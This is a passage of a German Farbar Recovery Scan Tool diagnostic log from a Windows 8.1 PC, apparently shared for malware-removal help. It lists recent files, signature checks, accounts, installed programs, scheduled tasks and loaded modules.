(Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll 2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-03-21 16:24 - 2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\inetcomm.dll 2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll 2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll 2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll 2016-03-21 16:18 - 2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll 2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) 
C:\WINDOWS\SysWOW64\atmfd.dll 2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll 2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll 2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS 2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp 2016-03-08 14:00 - 2016-03-08 14:00 - 00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF 2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe 2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER 2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe 2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe 2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe 2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe 2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 
2016-03-31 12:36 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-03-31 12:36 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat 2016-03-31 12:36 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat 2016-03-31 12:36 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf 2016-03-31 12:32 - 2013-10-24 13:02 - 00000000 ___DO C:\Users\Denny\SkyDrive 2016-03-31 12:30 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-03-31 12:29 - 2014-05-16 21:31 - 00000000 ____D C:\temp 2016-03-31 02:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-03-30 16:56 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-03-30 16:55 - 2013-08-22 17:36 - 00000000 ___HD C:\Program Files\WindowsApps 2016-03-30 14:03 - 2015-11-01 22:59 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001 2016-03-30 13:47 - 2016-01-28 22:26 - 00000000 ____D C:\Users\Denny\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Comodo 2016-03-30 12:54 - 2013-09-09 15:29 - 00000000 ____D C:\Program Files (x86)\Google 2016-03-29 18:44 - 2013-10-13 12:41 - 00001921 _____ C:\Users\Denny\Desktop\SonyEditor.lnk 2016-03-29 18:41 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Globalization 2016-03-29 18:41 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI 2016-03-29 18:20 - 2014-12-24 23:20 - 
00001058 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001052 _____ C:\Users\Public\Desktop\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001315 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-05-19 22:09 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk 2016-03-29 18:20 - 2014-03-29 08:08 - 00001047 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Download Assistant.lnk 2016-03-29 18:20 - 2013-12-07 10:06 - 00001110 _____ C:\Users\Public\Desktop\Acer Portal.lnk 2016-03-29 18:20 - 2013-11-10 21:21 - 00001178 _____ C:\Users\Public\Desktop\Acer Remote Files.lnk 2016-03-29 18:20 - 2013-11-10 21:20 - 00001140 _____ C:\Users\Public\Desktop\Acer Docs.lnk 2016-03-29 18:20 - 2013-10-24 12:44 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-03-29 18:20 - 2013-09-07 22:32 - 00000928 _____ C:\Users\Public\Desktop\EPSON Scan.lnk 2016-03-29 18:19 - 2016-02-19 13:56 - 00001454 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-29 18:11 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache 2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX 2016-03-28 23:13 - 2013-09-07 18:10 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2016-03-28 23:10 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator 2016-03-22 03:13 - 2014-12-25 19:50 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-03-22 03:12 - 2013-09-09 14:33 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-03-22 03:08 - 2013-09-09 14:33 - 
143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-03-22 00:21 - 2014-05-14 21:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-03-21 23:15 - 2013-08-22 17:36 - 00000000 ____D C:\Program Files\Common Files\System 2016-03-21 22:57 - 2016-01-28 10:48 - 00000000 ____D C:\Users\Denny\AppData\Local\CrashDumps 2016-03-21 18:50 - 2015-10-26 21:57 - 00000000 ____D C:\WINDOWS\Minidump 2016-03-21 18:16 - 2016-01-28 10:50 - 00000000 ____D C:\Users\Denny\AppData\Local\Tempfolder 2016-03-21 17:36 - 2013-08-22 16:44 - 00590976 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-03-21 17:17 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\FxsTmp 2016-03-21 16:11 - 2016-01-18 20:30 - 00718336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-03-21 16:11 - 2016-01-18 20:30 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-03-11 09:50 - 2013-09-15 13:17 - 00000000 ____D C:\Users\Denny\Documents\Rechnungen DS-KFZ 2016-03-09 18:38 - 2013-08-22 17:36 - 00000000 ___RD C:\WINDOWS\ToastData 2016-03-09 09:37 - 2013-09-30 05:59 - 00000000 ____D C:\Program Files\Windows Journal 2016-03-08 12:35 - 2016-02-05 00:36 - 00000000 ____D C:\Users\Denny\AppData\Local\Chromium 2016-03-08 12:08 - 2013-11-10 15:12 - 00267264 ___SH C:\Users\Denny\Desktop\Thumbs.db 2016-03-08 12:04 - 2013-10-24 13:25 - 00000000 ___DC C:\WINDOWS\Panther 2016-03-07 21:43 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\NDF ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2013-06-29 02:24 - 2013-06-29 02:24 - 0000000 ____H () C:\ProgramData\DP45977C.lfl 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLes.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLet.DAT 2014-03-28 08:18 - 2015-07-29 23:04 - 0000000 ____H () C:\ProgramData\PKP_DLev.DAT Einige Dateien in TEMP: ==================== C:\Users\Denny\AppData\Local\Temp\avgnt.exe ==================== 
Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2016-03-30 14:04

==================== Ende von FRST.txt ============================

FRST-Addition:
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-31 12:40:43)
Gestartet von C:\Users\Denny\Desktop
Windows 8.1 (X64) (2013-10-24 10:59:13)
Start-Modus: Normal
==========================================================

==================== Konten: =============================

Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider
Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny
Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated)
Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer)
Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated)
Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated)
Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated)
Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated)
Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) Hidden
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation)
HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Malwarebytes Anti-Malware Version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla)
Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG)
Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated)
Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation)
Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink)
Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer"
Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll
2016-03-31 12:32 - 2016-03-31 12:32 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll
